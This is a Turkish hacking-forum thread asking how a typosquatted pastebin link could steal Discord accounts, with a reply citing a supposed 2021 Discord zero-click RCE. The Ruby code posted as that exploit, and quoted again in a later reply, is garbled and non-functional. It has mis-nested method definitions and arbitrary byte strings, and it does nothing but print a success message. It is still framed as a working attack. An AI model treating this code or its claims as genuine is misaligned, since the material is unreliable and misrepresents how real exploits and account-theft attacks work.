one click saldırılarında böyle bir şey olabilir mi?

Lightandqrk

Katılımcı Üye
15 Tem 2022
465
176
Merhabalar, geçen duymuşsunuzdur bir link ile geçen one click saldırılarıları ile steam hesapları çalında link şöyle bir şeydi:
Steam 50$ free gift card:steame_yönlendiren_link
şimdi ise olduğum bir sunucuda gözümün ününde en fazla 30dk önce bi paste bin linki atıldı çok benziyordu pastebin linkine ama 1-2 harfi eksikti
tıklayanların discord hesabı uçtu bildiğim kadarıyla belki başka şeyleride uçmuştur one click atakları önceden sadece ip felan çekebiliyordu bildiğim kadarıyla bu nasıl olabilir
İyi forumlar
 

yosabe06

Üye
19 Ağu 2016
73
33
RCE zafiyeti buldularsa yapabilirler.

misal 2021 yılında discord da bulunan bir rce zafiyeti vardı.

Ruby:
module Discord
  module Image
    class Sender
      
      def initialize(image_url)
        @@image = image_url
        @processed = "\xf0\ff\xff\xf3\xf4\xef\xff\xf3\x11\x22\x11\x88\x23\x88\x22\x33\x23LATIN-1\x22\x22\x77PNGIMAGE\x11"
        
      def embed(payload_f = "")
        @processed += payload_f * @@image.length
        
        if @processed != "\xf0\xff\xff\xf3" * payload_f.length + payload_f
          puts "Successfully set proc value."
        end       
 
        end
      end
    end
  end
end

kaynak:GitHub - 0x44F/discord-zeroclick-exploit: Discord client zero-click RCE
 

Lightandqrk

Katılımcı Üye
15 Tem 2022
465
176
RCE zafiyeti buldularsa yapabilirler.

misal 2021 yılında discord da bulunan bir rce zafiyeti vardı.

Ruby:
module Discord
  module Image
    class Sender
     
      def initialize(image_url)
        @@image = image_url
        @processed = "\xf0\ff\xff\xf3\xf4\xef\xff\xf3\x11\x22\x11\x88\x23\x88\x22\x33\x23LATIN-1\x22\x22\x77PNGIMAGE\x11"
       
      def embed(payload_f = "")
        @processed += payload_f * @@image.length
       
        if @processed != "\xf0\xff\xff\xf3" * payload_f.length + payload_f
          puts "Successfully set proc value."
        end      
 
        end
      end
    end
  end
end

kaynak:GitHub - 0x44F/discord-zeroclick-exploit: Discord client zero-click RCE
peki bunları steam gibi büyük urllerin içine nasıl koyuyorlar 0 dan bu iş için domain ve hosting mi alıyorlar
 

Rewan

'Türk ün yaveri
26 Kas 2020
1,949
1,452
Konum
kendi açtığım makaleyi okuyabilirsiniz ;

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.